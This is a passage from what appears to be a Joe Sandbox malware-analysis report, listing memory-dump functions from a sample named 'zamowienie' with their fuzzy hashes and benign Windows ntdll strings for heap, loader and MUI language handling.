                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                              • API String ID: 0-3532704233
                                                                                                                                              • Opcode ID: 2021e22e9dd7f351a6e2eafea06760ed8ce5f1092561d58f8dc0b4fd2eaca962
                                                                                                                                              • Instruction ID: 536f074913477b7fc88a04fcb9ae23646b40189625097985f9b4dd5b32d3f800
                                                                                                                                              • Opcode Fuzzy Hash: 2021e22e9dd7f351a6e2eafea06760ed8ce5f1092561d58f8dc0b4fd2eaca962
                                                                                                                                              • Instruction Fuzzy Hash: 6EB16EB5909356DFE711CF94C840A6BBBE8EB84758F454D2EF888D7240DB30D9898B92
                                                                                                                                              Function 34F01070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                                              • API String ID: 3446177414-3570731704
                                                                                                                                              • Opcode ID: 754e262eb3b27d55bb2d15f83662e3be774e9e35afbb9d6aca0c2f7974256653
                                                                                                                                              • Instruction ID: dd8aa4b7207b29a92db45dfca25b9e40aaf2b058f91ca17a215d191b7f9a5490
                                                                                                                                              • Opcode Fuzzy Hash: 754e262eb3b27d55bb2d15f83662e3be774e9e35afbb9d6aca0c2f7974256653
                                                                                                                                              • Instruction Fuzzy Hash: CA926975A01328CFEB24DF28CD40B99B7B5BF85350F0989EAD849A7291D7319E82CF51
                                                                                                                                              Function 34F1D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlDebugPrintTimes.NTDLL ref: 34F1D959
                                                                                                                                                • Part of subcall function 34EF4859: RtlDebugPrintTimes.NTDLL ref: 34EF48F7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 3446177414-1975516107
                                                                                                                                              • Opcode ID: bdbe18102fe77af698e1dee31b49b2513a28358b7effc37ae68ec1914ca4eb86
                                                                                                                                              • Instruction ID: 4354409594420775026444a53317d0cec1a08eda47b8b0b503fcb71f3fae7b58
                                                                                                                                              • Opcode Fuzzy Hash: bdbe18102fe77af698e1dee31b49b2513a28358b7effc37ae68ec1914ca4eb86
                                                                                                                                              • Instruction Fuzzy Hash: 3551A976A04349DFEB14CFA4C88479DBBB1FF48368F588999D8006B291C774A983CF90
                                                                                                                                              Function 34F89179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                                              • API String ID: 0-3063724069
                                                                                                                                              • Opcode ID: 079e033fe25ab1d8b44c0bc990152233faf991f5fced32415201b659cee1c063
                                                                                                                                              • Instruction ID: dfd46ef07cd56ccc4b5a877fc8774e3372eeb9ff8cd335c6b8670eb8da2e58a2
                                                                                                                                              • Opcode Fuzzy Hash: 079e033fe25ab1d8b44c0bc990152233faf991f5fced32415201b659cee1c063
                                                                                                                                              • Instruction Fuzzy Hash: 5FD1C1B2805315AFE721CB54C840F6BB7E8AF84764F494D2DF994AB250D770C94A8FD2
                                                                                                                                              Function 34EED08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • @, xrefs: 34EED0FD
                                                                                                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 34EED146
                                                                                                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 34EED196
                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 34EED2C3
                                                                                                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 34EED262
                                                                                                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 34EED0CF
                                                                                                                                              • @, xrefs: 34EED313
                                                                                                                                              • @, xrefs: 34EED2AF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                              • API String ID: 0-1356375266
                                                                                                                                              • Opcode ID: 0be45dedde8a9b855e272dd7f37745c5438dd2f42bf4ee9952257ee5bd00863a
                                                                                                                                              • Instruction ID: 84a8b2b7d0349366f184015e85cdf1ff4929cbdb8ebb38c60c62c9197cffcca1
                                                                                                                                              • Opcode Fuzzy Hash: 0be45dedde8a9b855e272dd7f37745c5438dd2f42bf4ee9952257ee5bd00863a
                                                                                                                                              • Instruction Fuzzy Hash: 1BA13CB1908346DFE321CF64C440B6BBBE8FB84769F444E2EE59896240DB74D949CF92
                                                                                                                                              Function 34EEF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                              • API String ID: 0-523794902
                                                                                                                                              • Opcode ID: b31b052d7951f368dc426746fc090f593f986a4d1121aeb250e7b78ec2f12f40
                                                                                                                                              • Instruction ID: db2d38dfb97d0cbb68eb303edac192b71e72efe7d82c009f055c7ecc868d005d
                                                                                                                                              • Opcode Fuzzy Hash: b31b052d7951f368dc426746fc090f593f986a4d1121aeb250e7b78ec2f12f40
                                                                                                                                              • Instruction Fuzzy Hash: 2842E175615781EFE305CF28C880A2ABBE5FF88388F48496DE4958B352DB34D986CB51
                                                                                                                                              Function 34F0B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                              • API String ID: 0-122214566
                                                                                                                                              • Opcode ID: 51ced96ac91cf7c3ba1cfb5b13282692563022be240ab0e3ea8b002b2bedc437
                                                                                                                                              • Instruction ID: edaa10957a7c34b70383fa18cc91b4e4b49139bff25654ae1cdb35b8cfefc47d
                                                                                                                                              • Opcode Fuzzy Hash: 51ced96ac91cf7c3ba1cfb5b13282692563022be240ab0e3ea8b002b2bedc437
                                                                                                                                              • Instruction Fuzzy Hash: E4C11875A003159FEB148FA4C880B7F77A5AF85318F5CC8A9E901AB290DB74CD47EB91
                                                                                                                                              Function 34F00770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                              • API String ID: 0-4253913091
                                                                                                                                              • Opcode ID: e7735f961e2cfd85841ac29671d73de3e839616b82ca4c05cc5e152b61125c8d
                                                                                                                                              • Instruction ID: 4637e7515ef55dc0f20dc8cd62858974d6dfcd6d1f8cc90b5580eba31380d03a
                                                                                                                                              • Opcode Fuzzy Hash: e7735f961e2cfd85841ac29671d73de3e839616b82ca4c05cc5e152b61125c8d
                                                                                                                                              • Instruction Fuzzy Hash: A6F19775B00605DFEB14CF68D880B6AB7F5FB85304F1889A8E4059B3A5DB34E982DF91
                                                                                                                                              Function 34F1F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • RTL: Re-Waiting, xrefs: 34F6031E
                                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 34F602E7
                                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 34F602BD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                              • API String ID: 0-2474120054
                                                                                                                                              • Opcode ID: ab60f6783ad0f4e9eac0f2d8d2bfd7f44da7ec36313b52256d3efdb45ccdd196
                                                                                                                                              • Instruction ID: c1a0d65c08db795aabf3cd4711ffaead9171a4458f73379c82113c3d969972bc
                                                                                                                                              • Opcode Fuzzy Hash: ab60f6783ad0f4e9eac0f2d8d2bfd7f44da7ec36313b52256d3efdb45ccdd196
                                                                                                                                              • Instruction Fuzzy Hash: 1FE18E75604741DFE711CF28C880B1AB7E4EF88368F280E5DE5A58B2D2DB78D946CB52
                                                                                                                                              Function 34F79C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                                                              • API String ID: 3446177414-3127649145
                                                                                                                                              • Opcode ID: 13ceccd22d19fbab12c1520cca12e9e367d4cff37dc1f14edc8907e9d7f6cf4f
                                                                                                                                              • Instruction ID: 372a3b86142b1a468acfddb71adb884798329ab4b1faf188c16c4e7d3293c598
                                                                                                                                              • Opcode Fuzzy Hash: 13ceccd22d19fbab12c1520cca12e9e367d4cff37dc1f14edc8907e9d7f6cf4f
                                                                                                                                              • Instruction Fuzzy Hash: AD325D75A01319DFEB21CF25CC88B9ABBB8FF44340F144AEAD508A7650DB769A85CF50
                                                                                                                                              Function 34F151EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 34F1542B
                                                                                                                                              • WindowsExcludedProcs, xrefs: 34F1522A
                                                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 34F15247
                                                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 34F15352
                                                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 34F1527B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                              • API String ID: 0-258546922
                                                                                                                                              • Opcode ID: 6f32881ec0deb54d14b09f636fed7e907bf6e32576e5cbf8b3865f947bd0bec3
                                                                                                                                              • Instruction ID: b417fcb7e2c175d29b3db32096bd1978ac85f4a4314bbce40c6858360423afd1
                                                                                                                                              • Opcode Fuzzy Hash: 6f32881ec0deb54d14b09f636fed7e907bf6e32576e5cbf8b3865f947bd0bec3
                                                                                                                                              • Instruction Fuzzy Hash: B8F17EB6D01229EFDB45CF94C9809EEBBF9FF48654F59485AE401E7210DB749E02CB90
                                                                                                                                              Function 34FCB16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: 63a84f033d4ab08bd331c5385ac49d2c5d35c542397e3e8b3f05255f7e385196
                                                                                                                                              • Instruction ID: fb1327387d7d4f29e0db4ecab75ce00b1530f39181c0c8b17566016659cc9275
                                                                                                                                              • Opcode Fuzzy Hash: 63a84f033d4ab08bd331c5385ac49d2c5d35c542397e3e8b3f05255f7e385196
                                                                                                                                              • Instruction Fuzzy Hash: 7CF1067AE406128FDB08CFA8D99067EBBF5EF8821071D496DD456DB384E634ED42CB90
                                                                                                                                              Function 34FA11A4 Relevance: 6.4, Strings: 5, Instructions: 113COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: This is located in the %s field of the heap header.$ -4`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                                              • API String ID: 0-1168109116
                                                                                                                                              • Opcode ID: 779614e4cd36bf1d84869a533a9915a542f9b95404eec2b5508d0aff980b2cbd
                                                                                                                                              • Instruction ID: c5024703c7758efa54a20111c1a8d78bb6d6c35fc9dbf9ff6b5f1e9a531fd449
                                                                                                                                              • Opcode Fuzzy Hash: 779614e4cd36bf1d84869a533a9915a542f9b95404eec2b5508d0aff980b2cbd
                                                                                                                                              • Instruction Fuzzy Hash: 2731E736211210EFE704DB98CA80F6677E8EF05768F5E0899F501DB291DA35ED82CF65
                                                                                                                                              Function 34EE76B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                              • API String ID: 0-3061284088
                                                                                                                                              • Opcode ID: 557d4b5f01ae95c788645603e941ee5bd63029f4dc6e648d13e3f642aa850b29
                                                                                                                                              • Instruction ID: d732343583268d8cbeb086defdc412576d69483eb71874dae490b2a237778839
                                                                                                                                              • Opcode Fuzzy Hash: 557d4b5f01ae95c788645603e941ee5bd63029f4dc6e648d13e3f642aa850b29
                                                                                                                                              • Instruction Fuzzy Hash: 230147760252A2DFE31DC328E509F627FE8DF42631F28448EE01047792CE699CC1DA60
                                                                                                                                              Function 34F070C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                              • API String ID: 0-3178619729
                                                                                                                                              • Opcode ID: 56bda85b8b537072d565a927cb9ebbc0441dd6f3b4298688aa400e024ec0cdc8
                                                                                                                                              • Instruction ID: 54f0a860cf4b8b41fefd7a547edccd1bcb29d0de99d9a2b47c9c8547026c9099
                                                                                                                                              • Opcode Fuzzy Hash: 56bda85b8b537072d565a927cb9ebbc0441dd6f3b4298688aa400e024ec0cdc8
                                                                                                                                              • Instruction Fuzzy Hash: 22138B74A00655DFEB14CF68C8907A9BBF1BF89304F18C9ADD849AB381D734A946DF90
                                                                                                                                              Function 34EFB6C0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\U4
                                                                                                                                              • API String ID: 0-1235668821
                                                                                                                                              • Opcode ID: b8d9810c5d914b8bff904ecd1da2eeed7d5afe95b84acf5735425e6de1e2fa83
                                                                                                                                              • Instruction ID: d8446c397e448ca4a42040dee65492f317722d1e5aa84bc249d5d8e8e4569f18
                                                                                                                                              • Opcode Fuzzy Hash: b8d9810c5d914b8bff904ecd1da2eeed7d5afe95b84acf5735425e6de1e2fa83
                                                                                                                                              • Instruction Fuzzy Hash: B2B1CE76A15744DFEB19CF68CC80B9DB7B6AF84794F19896DE811EB290D731E842CB00
                                                                                                                                              Function 34EFB440 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\U4${
                                                                                                                                              • API String ID: 0-2183333318
                                                                                                                                              • Opcode ID: cb6363ff4cb5d86b9fab3c511b606779d22ba3c5fa6c1ae7d008ec40c8bcd4bf
                                                                                                                                              • Instruction ID: ec1521fe6e69e00aaf38684a7bd6b0525a71145212c95694b5827f45d3d08e23
                                                                                                                                              • Opcode Fuzzy Hash: cb6363ff4cb5d86b9fab3c511b606779d22ba3c5fa6c1ae7d008ec40c8bcd4bf
                                                                                                                                              • Instruction Fuzzy Hash: 3C91E2B5E04319CFEB11CF58D940BDE77B5FF00354F1A8999E810AB2A0D779AA42CB90
                                                                                                                                              Function 34EEF626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
